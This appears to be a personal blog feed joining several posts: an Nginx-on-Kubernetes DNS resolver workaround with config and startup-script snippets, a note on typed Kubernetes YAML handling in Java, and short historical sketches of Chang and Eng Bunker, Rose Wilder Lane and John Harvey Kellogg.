]]>“How Spotify Accidentally Deleted All its Kube Clusters with No User Impact”
“Spotify, with David Xia”. Listen on Spotify here.
I moved a backend service foo from running on a virtual machine to K8s. Foo’s clients include an Nginx instance running outside K8s configured with this upstream block.
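The block looked roughly like this (the upstream name and port are stand-ins):
```nginx
upstream foo {
    # foo.example.com's A records are the Pod IPs described below
    server foo.example.com:8080;
}
```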
K8s Pods can be rescheduled anytime, so their IPs aren’t stable. I’m supposed to use K8s Services to avoid caching these ephemeral Pod IPs. But in my case, for interoperability reasons, I was registering Pod IPs directly as A records for foo.example.com. I started noticing that after my Pod IPs changed, either because of rescheduling or updating the Deployment, Nginx started throwing 502 Bad Gateway errors.
Nginx resolves statically configured domain names only once, at startup or configuration reload time. So Nginx resolved foo.example.com. once at startup to several Pod IPs and cached them forever.
Using a variable for the domain name will make Nginx resolve and cache it using the TTL value of the DNS response. So replace the upstream block with a variable and change the proxy_pass line to use it. I have no idea why it has to be a variable to make Nginx resolve the domain periodically.
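Something along these lines (the variable name and port are stand-ins):
```nginx
# inside the server/location block that used to reference the upstream
set $foo_backend foo.example.com;
proxy_pass http://$foo_backend:8080;
```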
This behavior isn’t documented but has been observed empirically and discussed here, here, and here. I also learned that this setup requires me to define a resolver in the Nginx configs. For some reason Nginx resolves statically configured domains by querying the nameserver specified in /etc/resolv.conf, but periodically resolved domains require a completely different config setting. I would love to know why.
The VM on which Nginx was running ran a Bind DNS server locally, so I set resolver 127.0.0.1. I triggered the code path that made Nginx send requests to foo and saw periodic DNS queries occurring with sudo tcpdump -i lo -n dst port 53 | grep foo.
I had another Nginx instance that also made requests to foo. This Nginx was running on K8s too. It was created with this Deployment YAML.
The nginx-config ConfigMap was:
I replaced upstream with the same pattern above, but in this case when I needed to define resolver I couldn’t use 127.0.0.1 because there’s no Bind running locally. I can’t hardcode the resolver because it might change.
If Nginx and foo run on the same K8s cluster, I can use the cluster-local DNS record created by a K8s Service matching the foo Pods. A Service like this (sketched below with an assumed selector label and port)
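```yaml
apiVersion: v1
kind: Service
metadata:
  name: foo
  namespace: bar
spec:
  selector:
    app: foo      # assumed label on the foo Pods
  ports:
    - port: 8080  # stand-in port
```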
will create a DNS A record foo.bar.svc.cluster.local. pointing to the K8s Service’s IP. Since this Service’s IP is stable and it load balances requests to the underlying Pods, there’s no need for Nginx to periodically look up the Pod IPs. I can keep the upstream block like so.
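For instance (port again a stand-in):
```nginx
upstream foo {
    server foo.bar.svc.cluster.local:8080;
}
```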
As its name implies, foo.bar.svc.cluster.local. is only resolvable within the cluster. So Nginx has to be running on the same cluster as foo.
Set resolver equal to the system’s when the Pod starts
Disclaimer: This “solution” is more of an ugly, brittle hack that should only be used as a last resort.
What if Nginx is on another K8s cluster? Then I can set resolver to the IP of one of the nameservers in /etc/resolv.conf. After a bunch of tinkering I came up with this way to dynamically set the Nginx resolver when the Pod starts: a placeholder for resolver is set in the Nginx ConfigMap, and a command at Pod startup copies over the templated config and replaces the placeholder with a nameserver IP from /etc/resolv.conf.
Change the nginx-config ConfigMap to:
Deployment YAML then becomes (note the added command, args, and new volume and volumeMount):
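The key piece is the startup command; a sketch of what it might do (the paths, placeholder token, and file names here are my own illustration):
```sh
# Pick the first nameserver out of /etc/resolv.conf, substitute it for the
# RESOLVER_PLACEHOLDER token in the templated config from the ConfigMap volume,
# write the result into a writable emptyDir volume, then start nginx.
NAMESERVER=$(awk '/^nameserver/ { print $2; exit }' /etc/resolv.conf)
sed "s/RESOLVER_PLACEHOLDER/${NAMESERVER}/" /etc/nginx-template/default.conf \
  > /etc/nginx/conf.d/default.conf
exec nginx -g 'daemon off;'
```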
A volume of type emptyDir is needed because recent versions of K8s made configMap volumes read-only; emptyDir volumes are writable.
Hopefully this helps some people out there who don’t want to spend as much time as I did Googling obscure Nginx behavior.
Recently, I’ve been trying to refactor an internal Spotify deployment tool my team built and maintains. This deployment tool takes Kubernetes (k8s) YAML manifests, changes them, and essentially runs kubectl apply. We add metadata, like labels, to the k8s manifests.
Right now this tool receives the input YAML as strings, converts them to Jackson ObjectNodes, and manipulates those ObjectNodes. The disadvantage of this is that there’s no k8s type-safety. We might accidentally add a field to a Deployment that isn’t valid or remove something from a Service that’s required.
My refactor uses upstream k8s model classes from kubernetes-client/java which are themselves generated from the official Swagger spec. Here’s a helpful Yaml utility class that deserializes YAML strings into concrete classes and can also serialize them back into YAML strings. So helpful.
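A round trip with that utility class looks roughly like this (the package path is the one in recent client versions, io.kubernetes.client.openapi.models; older versions differ, and the label value is just an illustration):
```java
import io.kubernetes.client.openapi.models.V1Deployment;
import io.kubernetes.client.util.Yaml;

import java.util.Map;

public class AddLabels {
  public static void main(String[] args) throws Exception {
    String manifest = String.join("\n",
        "apiVersion: apps/v1",
        "kind: Deployment",
        "metadata:",
        "  name: foo");

    // Deserialize the YAML string into a typed model class.
    V1Deployment deployment = Yaml.loadAs(manifest, V1Deployment.class);

    // Mutate it in a type-safe way instead of poking at Jackson ObjectNodes.
    deployment.getMetadata().setLabels(Map.of("team", "my-team"));

    // Serialize it back into a YAML string.
    System.out.println(Yaml.dump(deployment));
  }
}
```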
Unfortunately, there are some bugs in the YAML (de)serialization that prevent me from finishing this effort.
Nonetheless, it’ll be much nicer to change k8s resources in a type-safe way instead of parsing and rewriting raw YAML strings.
]]>Who else deserves to be on this list?
So I, often being ignorant of their fame, have casually interacted with them or criticized their milk steaming techniques when they’re using the office’s $20K espresso machine.
Only later am I told by their posse, “Did you know that was Mark Ronson/Bebe Rexha/Max Martin/etc?”
“It’s OK,” I say. “Now Max knows how to make a real latte.”
]]>I’ve come to cherish this little tradition more and more. I need to plan my next trip to Boston!
]]>Chang and Eng were conjoined twins born in Siam (present-day Thailand) in the 1800s. The term “Siamese twins” is based on them.
The brothers were joined at the sternum by a small piece of cartilage, and though their livers were fused, they were independently complete.
After a Scotsman noticed them and paraded them around as a freak show attraction for ten years, the Bunker twins settled down in Wilkesboro, North Carolina. They married two local white women who were sisters. They became naturalized American citizens and even owned slaves.
The Bunkers and their wives slept in a bed built for four. After a while their wives started to not get along, so they alternated between two different houses. Chang had twelve children while Eng had ten. Today their descendants number more than 1,500 and hold reunions. Their liver is on display at the Mütter Museum in Philadelphia, Pennsylvania.
Rose Wilder Lane was the eldest child of Laura Ingalls Wilder, the ostensible author of the Little House book series. Lane was by all means a boss ass bitch who lived a full life.
Sick of crop failures and tough frontier life, Lane moved in 1908 to San Francisco, California. She married a salesman named Gillette Lane and became pregnant. Sadly, her son was stillborn, and a subsequent surgery left her unable to have kids.
She felt her intellectual interests did not mesh with the life she was living with her husband. Keenly aware of her lack of a formal education, during these years, Lane read voraciously and taught herself several languages. Her writing career began around 1908, with occasional freelance newspaper jobs that earned much-needed extra cash.
Lane’s writing career took off. She wrote for publications like Harper’s and Saturday Evening Post.
In the late 1920s, Lane was reputed to be one of the highest-paid female writers in America, and along with Hoover, she counted among her friends well known figures such as Sinclair Lewis, Isabel Paterson, Dorothy Thompson, John Patric, and Lowell Thomas.
When Lane’s mother approached her with a rough autobiographical manuscript of her own childhood, Lane sensed that an American public fatigued by the Great Depression would take to the story of the loving, persistent, and independent Ingalls family. Lane encouraged and helped her mother rewrite and sell the story as a children’s novel. The book became a big success, and an entire series replete with T.V. shows, merchandise, and museums followed. Their family was raking in the dough.
I read the entire series as a kid and still wax nostalgic for it. I thought Lane’s mother, who’s the titled author, wrote every book on her own and only received encouragement from Lane. It turns out, however, that the truth is more interesting.
…an ongoing mutual collaboration that involved Lane more extensively in the earlier books, and to a much lesser extent by the time the series ended, as Wilder’s confidence in her own writing ability increased. Lane insisted to the end that her role was little more than that of her mother’s adviser, despite documentation to the contrary…Literary historians believe that Lane’s editing skills brought the dramatic pacing, literary structure, and characterization critically needed to make the stories publishable in book form.
Even more fascinating is Lane’s societal and political views. She was a libertarian, economically laissez faire, anti-racist, and anti-communist. She protested paying income taxes, opposed the New Deal, and thought Social Security was a Ponzi scheme that would destroy the United States.
Lane played a hands-on role during the 1940s and 1950s in launching the “libertarian movement” and began an extensive correspondence with figures such as DuPont executive Jasper Crane and writer Frank Meyer, as well as her friend and colleague, Ayn Rand. She wrote book reviews for the National Economic Council and later for the Volker Fund, out of which grew the Institute for Humane Studies. Later, she lectured at, and gave generous financial support to, the Freedom School headed by libertarian Robert LeFevre.
I want to reread the Little House books now knowing she was a die-hard libertarian who along with her mother purposefully wove themes of individualism into the series.
Rose Wilder Lane died in her sleep at age 81, on October 30, 1968, just as she was about to depart on a three-year world tour. She was buried next to her parents at Mansfield Cemetery in Mansfield, Missouri.
I haven’t read the entire Wikipedia entry on John Harvey Kellogg yet since a colleague only recently drew my attention to this smart, prolific, and bizarre man. These parts stood out to me at first glance though.
He also recommended, to prevent children from this “solitary vice”, bandaging or tying their hands, covering their genitals with patented cages, and administering electrical shock.
Mozilla’s TLS configuration generator is useful for providing secure defaults.
I’m proud to say this site has an A.
]]>